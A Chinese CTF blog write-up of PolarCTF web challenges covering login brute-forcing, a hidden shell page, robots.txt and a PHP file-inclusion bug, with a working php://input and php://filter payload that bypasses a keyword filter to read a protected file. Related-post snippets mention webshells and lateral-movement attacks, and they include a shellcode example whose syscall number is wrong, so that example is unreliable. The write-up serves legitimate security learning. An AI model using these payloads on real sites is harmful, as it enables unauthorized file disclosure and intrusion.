polarctf靶场【web】login、被黑掉的站、GET-POST、网站被黑、robots

最新推荐文章于 2025-03-20 10:54:20 发布
最新推荐文章于 2025-03-20 10:54:20 发布
阅读量1.3k 收藏 12
点赞数 15
分类专栏: polarD&NCTF靶场 WriteUP 文章标签: 前端 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73981089/article/details/138204669
版权

[web]login

考点:sql查询,bp爆破

看源代码,发现有一串数字

用bp抓包爆破,然后发现了改变学号最后两位为02-11的时候会回显flag

添加数据之后点击开始攻击

[web]被黑掉的站

考点:目录扫描、bp爆破

界面无任何提示,dirsearch扫一下目录,发现了/index.php.bak还有shell.php,访问

发现.bak里面是一个字典

shell里面是一个登录界面

拿着这个字典去bp爆破

输入nikel的时候就会回显flag

[web]GET-POST

考点:GET传参和POST传参

看代码

?id=1


?id=1
post:
jljcxy=flag

​[web]网站被黑

base32解码

是一个子域

<?php
error_reporting(0);

$text = $_GET["text"];//get传参text
$file = $_GET["file"];//get传参file
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){//判断是否输入text参数,并且text参数的值要为welcome to the 504sys
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag|data|base|write|input/i",$file)){//file不能为flag|data|base|write|input,若为上述字符串则不能输入flag
        echo "I am sorry but no way!";
        exit(); 
    }else{
        include($file);  //imposible.php,这个为放着flag的文件
    }
}
else{
    highlight_file(__FILE__);
}
?>

text值要为特定值,还为file_get_contents函数,直接使用php://input伪协议赋予text特定值
接下来利用 $file参数读取imposible.php的内容,因为存在 include()函数,所以想到使用伪协议读取,但是这里过滤了base,无法使用base64编码的方法去读,考虑使用rot13编码去读
那么可以得到payload:

GET:?text=php://input&file=php://filter/read=string.rot13/resource=imposible.php
POST:welcome to the 504sys

php://filter伪协议用法

php://filter/resource=http://www.example.com        //没有进行任何过滤,直接读取
php://filter/read=string.toupper/resource=xxx.php    //对文件的内容进行大写转换后读取
php://filter/convert.base64-encode/resource=xxx.php        //对文件进行base64加密后读取
php://filter/read=string.toupper|string.rot13/resource=xxx.php    //对文件的内容进行大写转换后并使用rot13加密后读取
php://filter/write=string.rot13/resource=example.txt","Hello World  
//这会通过 rot13 过滤器筛选出字符 "Hello World",然后写入当前目录下的 example.txt
php://filter/read=string.rot13/resource=hello.php
php://filter/string.rot13/resource=imposible.php

rot13解码

[web]robots

考点:敏感文件

根据题目以及进题的提示,应该是robots协议

进/robots.txt访问一下

发现了/fl0g.php,再将其访问,便可得到flag

robots是搜索引擎爬虫协议,也就是你网站和爬虫的协议。

简单的理解:robots是告诉搜索引擎,你可以爬取收录我的什么页面,你不可以爬取和收录我的那些页面。robots很好的控制网站那些页面可以被爬取,那些页面不可以被爬取。

主流的搜索引擎都会遵守robots协议。并且robots协议是爬虫爬取网站第一个需要爬取的文件。爬虫爬取robots文件后,会读取上面的协议,并准守协议爬取网站,收录网站。

robots文件是一个纯文本文件,也就是常见的.txt文件。在这个文件中网站管理者可以声明该网站中不想被robots访问的部分,或者指定搜索引擎只收录指定的内容。因此,robots的优化会直接影响到搜索引擎对网站的收录情况。

robots文件必须要存放在网站的根目录下。也就是 域名/robots.txt 是可以访问文件的。你们也可以尝试访问别人网站的robots文件。 输入域名/robots.txt 即可访问。

Initial靶场(thinkphp漏洞、内网隧道、mysql写webshell)
墨痕诉清风的博客
03-14 358
DCSync(域控制器同步)攻击利用的是域控制器之间的数据同步复制机制。172.22.1.15就不用看了,172.22.1.21是个存在永恒之蓝的Win7,172.22.1.18是个信呼OA的系统,172.22.1.2是个域控。拿到所有用户的hash,172.22.1.2 的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec攻击。回显出来的就是写进去一句话木马的路径,访问路径就可以执行命令,然后在蚁剑上配置一下代理,如果不配的代理话蚁剑也是没法直接访问到内网的。
OSCP靶场6-Stapler(用户收集、wordpress、SMB、mysql上传文件执行反弹shell、用户历史命令)
墨痕诉清风的博客
06-06 508
步骤 0:目标发现所以……和往常一样,让我们​​看看我们的目标在网络上的位置10.10.10.1 是 DHCP 服务器……让 10.10.10.2 成为“受害者”机器第 1 步:TCP 开放端口扫描为了速度,我们现在不会专注于版本扫描等……我们只是想看看有什么是活着的虽然有些端口看起来很明显,但还有一些其他端口,例如 '666' 被错误地表示为 'doom' - 这些只是特定端口号的 nmap 默认值。我们需要进行更详细的扫描,以查看真正活着的东西。第 2 步:TCP 主动端口扫描。
BugkuCTF-WEBlogin1
am_03的博客
08-29 1535
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
Polar Web 【简单】-
AlanKSorata的博客
06-03 393
记录本题旨在记录针对已攻陷点的基本思路,以及密码爆破脚本的编写思路
Polarctf PWN(简单):持续跟新
最新发布
2302_81473559的博客
03-20 1168
我是在学习PWN知识中在B刚好有Polarctf平台的师傅讲的很好,所以发现了这个平台。由于我是新手如果文章那里有讲的不对的地方欢迎指正连接如下:B连接【PolarCTF入门系列讲座——PWN篇】Polarctf平台连接开始进入主题。
polar CTF web
samRsa
01-02 728
polar CTF web 看到shell.php和index.php.bak。一看就是爆破,字典都给了,最后得到为。1、dirsearch 扫目录。
Web】记录Polar靶场<简单>难度题一遍过(全)
uuzeray的博客
04-01 3952
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
polarctf靶场web】swp、召唤神龙、浮生日记、干正则
m0_73981089的博客
05-07 1925
swp,jsfuck编码解密,xss,preg_match()函数绕过,parse_str变量覆盖
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 5701
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
“百度杯” CTF比赛 十月场 Web-登录
qq_34106499的博客
02-18 1632
1. mysql盲注及脚本编写 2. .git泄露
网络靶场攻防综合实验
weixin_46605806的博客
12-20 7575
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
Hacker Fest: 2019-Walkthrough【VulnHub靶场】渗透测试实战系列3
重新启程
12-04 1358
靶场地址:Hacker Fest: 2019 这个靶场在CTF中的等级是easy,作者也提供了一些线索,所以比较适合小伙伴们独立完成。 这个题目是两阶段flag标志获取,普通用户和root分别有flag.txt 虚拟机:virtual box(注:经测试,vmware使用有异常) 虚拟机安装好之后,拿出kali,先扫一下机器地址 nmap -sn 192.168.56.0/24 ...
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
CSF三层主机:渗透测试靶场笔记
Zeker62的博客
03-27 5935
测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略。
“百度杯” CTF比赛 九月场 Web-Login
qq_34106499的博客
01-17 752
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
polarctf靶场web】session文件包含、自由的文件上传系统、爆破、XFF、 rce1、iphone、ezupload
m0_73981089的博客
04-26 2374
session文件包含、文件包含、XXF伪造、rce、UA的修改、文件上传漏洞、爆破
ctf-WEB-login2(sql注入)
god_001的博客
05-12 3207
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 4160
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
Polar Web【简单】login
AlanKSorata的博客
06-02 363
本题如果少了必要的探索过程,难以知悉有这样的爆破思路同时尝试了独立用脚本实现爆破过程。
polarctf靶场easyshellcode
03-09
### PolarCTF Easy Shellcode Challenge Walkthrough In the context of CTF challenges, particularly within PolarCTF’s Easy Shellcode challenge, participants are often tasked with crafting a simple shellcode that performs specific actions without using certain characters or instructions to increase difficulty[^1]. The goal typically involves creating an executable code snippet that can bypass restrictions and achieve objectives such as spawning a shell. For this particular challenge, contestants need to understand assembly language fundamentals along with how operating systems handle memory execution permissions. A common approach is to write minimalistic inline assembly codes which avoid bad chars (characters not allowed by filters). This requires deep knowledge about system calls on Linux environments since most challenges occur there[^2]. To solve similar problems effectively: - Study basic principles behind writing position-independent shellcodes. - Learn techniques like encoding payloads to evade detection mechanisms. - Practice debugging skills through tools like GDB for analyzing binary behaviors during runtime. ```nasm section .text global _start _start: xor eax, eax ; Clearing registers push eax ; Push NULL bytes onto stack mov al, 0x6c ; syscall number for execve(/bin/sh) lea ebx, [esp] ; Load address of "/bin//sh" int 0x80 ; Trigger interrupt to invoke kernel function call ``` This example demonstrates part of what might be involved when tackling these types of tasks but should only serve educational purposes rather than being directly applicable due to variations between different instances of challenges[^3].
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒排骨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值